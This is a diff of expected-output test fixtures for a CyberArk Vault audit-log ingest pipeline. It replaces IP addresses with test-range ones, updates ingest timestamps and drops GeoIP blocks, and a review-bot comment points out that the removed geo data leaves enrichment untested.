@@ -133,7 +133,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:32.715285900Z", + "ingested": "2021-12-09T13:36:53.859787800Z", "original": "\u003c7\u003e1 2021-03-08T18:32:03Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:32:03\",\"IsoTimestamp\":\"2021-03-08T18:32:03Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adriansra\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "309", "kind": "event", @@ -157,20 +157,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -190,7 +178,7 @@ "PSMAdmin" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
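Review bot: The new expectation in the `@@ -157,20 +157,8 @@` hunk drops the whole `source.geo` object (continent, country, city, location) together with the IP swap, so the fixture no longer asserts anything about the pipeline's GeoIP enrichment; the same loss appears for `destination.geo` in `@@ -236,20 +224,8 @@` and for both `source.geo` and `destination.geo` in `@@ -324,33 +300,12 @@`. If the reason for moving to the supported address range is that the test GeoIP database resolves those addresses deterministically, the regenerated output for `67.43.156.13` and `67.43.156.15` should contain a `geo` object rather than none; its absence suggests the expectations were regenerated without that database loaded, which would let the test pass while enrichment goes untested. Worth confirming how the generator was run and regenerating if so; if geo is genuinely expected to be absent for these addresses, a sentence in the PR description saying why would spare the next reader the same question.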
@@ -198,8 +186,8 @@ "severity": "Error", "rfc5424": true, "iso_timestamp": "2021-03-11T16:43:26Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:43:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:43:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePSMAdmin\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:43:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:43:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User 
Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePSMAdmin\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Undefined User Logon", "message": "Undefined User Logon", "issuer": "PSMAdmin", 
@@ -212,8 +200,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:32.715289Z", - "original": "\u003c7\u003e1 2021-03-11T16:43:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:43:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:43:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMAdmin\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:43:26\",\"IsoTimestamp\":\"2021-03-11T16:43:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"PSMAdmin\",\"Action\":\"Undefined User 
Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:53.859793400Z", + "original": "\u003c7\u003e1 2021-03-11T16:43:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:43:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:43:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMAdmin\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:43:26\",\"IsoTimestamp\":\"2021-03-11T16:43:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"PSMAdmin\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"\"}}}", "code": "309", "kind": "event", "action": "authentication_failure", @@ -236,20 +224,8 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "address": "127.0.0.1", @@ -277,7 +253,7 @@ ], "ip": [ "127.0.0.1", - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -285,9 +261,9 @@ "severity": "Error", "rfc5424": true, "iso_timestamp": "2021-03-11T17:46:28Z", - "gateway_station": "81.32.170.205", + "gateway_station": "67.43.156.13", "station": "127.0.0.1", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003eadrian\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003eadrian\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Undefined User Logon", "message": "Undefined User Logon", "issuer": "adrian", 
@@ -300,8 +276,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:32.715291600Z", - "original": "\u003c7\u003e1 2021-03-11T17:46:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eadrian\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:28\",\"IsoTimestamp\":\"2021-03-11T17:46:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adrian\",\"Action\":\"Undefined User 
Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"81.32.170.205\"}}}", + "ingested": "2021-12-09T13:36:53.859798700Z", + "original": "\u003c7\u003e1 2021-03-11T17:46:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eadrian\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:46:28\",\"IsoTimestamp\":\"2021-03-11T17:46:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adrian\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "309", "kind": "event", "action": "authentication_failure", @@ -324,33 +300,12 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -373,8 +328,8 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -382,9 +337,9 @@ "severity": "Error", "rfc5424": true, "iso_timestamp": "2021-03-14T13:28:00Z", - "gateway_station": "34.71.250.247", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:28:00\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:28:00Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003etestark\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:28:00\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:28:00Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e309\u003c/MessageID\u003e\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003etestark\u003c/Issuer\u003e\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Undefined User Logon", "message": "Undefined User Logon", "issuer": "testark", 
@@ -397,8 +352,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:32.715294Z", - "original": "\u003c7\u003e1 2021-03-14T13:28:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:28:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:28:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003etestark\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:28:00\",\"IsoTimestamp\":\"2021-03-14T13:28:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"testark\",\"Action\":\"Undefined User 
Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"34.71.250.247\"}}}", + "ingested": "2021-12-09T13:36:53.859804100Z", + "original": "\u003c7\u003e1 2021-03-14T13:28:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:28:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:28:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e309\u003c/MessageID\u003e\\n \u003cDesc\u003eUndefined User Logon\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003etestark\u003c/Issuer\u003e\\n \u003cAction\u003eUndefined User Logon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUndefined User Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
